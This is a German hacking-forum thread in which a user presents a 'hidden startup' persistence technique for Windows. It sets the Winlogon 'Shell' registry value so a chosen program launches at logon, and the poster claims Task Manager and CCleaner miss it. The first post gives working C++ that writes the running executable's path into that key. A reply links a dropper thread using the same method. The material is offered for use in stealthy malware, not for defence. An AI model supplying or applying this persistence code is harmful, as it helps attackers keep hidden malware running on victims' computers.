Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

Hidden Startup

- - - - -

  • Bitte melde dich an um zu Antworten
2 Antworten in diesem Thema

#1
gr33d

gr33d

    Pentester

  • Premium Member
  • Likes
    169
  • 130 Beiträge
  • 471 Bedankt
  • Android [root]
  • Windows, Linux

Hallo Leute,

hier mal meine Technik wie ich hidden startup realisiere.

Wird nicht erkannt von:

  • Windows 8/10 Task Manager
  • CCleaner
  • Please Login HERE or Register HERE to see this link!

  • ...

Angezeigt wird es leider bei

Please Login HERE or Register HERE to see this link!

.

 

So funktionierts:

Den Key "Shell" in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" folgendermaßen ändern:

explorer.exe,"Pfad zum Programm das ausgeführt werden soll + name"

z.B. 

explorer.exe,"C:\users\admin\file.exe"

fertig!

 

Hier ist noch der Code dazu in C++:

char fname[MAX_PATH];
GetModuleFileNameA(NULL, fname, MAX_PATH); //Pfad zum programm (wie argv[0] glaube ich)
		
std::string newkey;
newkey = "explorer.exe,";
newkey += "\"";
newkey += fname;
newkey += "\"";
HKEY nkey;
RegCreateKeyExW(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 0, NULL, 0, KEY_WRITE, NULL, &nkey, NULL);
RegSetValueExA(nkey, "Shell", 0, REG_SZ, (const BYTE*)newkey.c_str(), newkey.size());
RegCloseKey(nkey);

das gecaste lässt sich bestimmt auch vermeiden aber bin ja noch ein Anfänger...

Ich hoffe man erkennt den Sinn dahinter :D

 

LG

GR33D


  • cubik gefällt das

#2
rat123

rat123

    Member

  • Premium Member
  • Likes
    97
  • 107 Beiträge
  • 31 Bedankt
  • verifiziert

https://www.toolbase...ropper/?p=44706


Eingefügtes Bild


#3
gr33d

gr33d

    Pentester

  • Premium Member
  • Likes
    169
  • 130 Beiträge
  • 471 Bedankt
  • Android [root]
  • Windows, Linux

Ah verdammt... Hast mich erwischt 

Ne sorry hab ich nicht gesehen aber das scheint die selbe Methode zu sein   :fail:


  • rat123 gefällt das



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 36 user(s)


    3eyes, blue_eyed_devil, Born2Hack, Caruso, chexum, cubik, Dean36, decent, Framerater, gr33d, Hansiberg, Haxlor, JohnR, keyb0ardz, kiwitone, Kraenk, m0nk3y, Mehranxenso, Mini Rick, nibble nibble, notfound, o0o, OMEGA, peppi200, pfadn, pr0legend, Psykoon303, rat123, Stadt-Zofe, sup3ria, terratec1991, Toskom4n, TuttiFrutti, Xenos88, xxas, Zerobyte
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.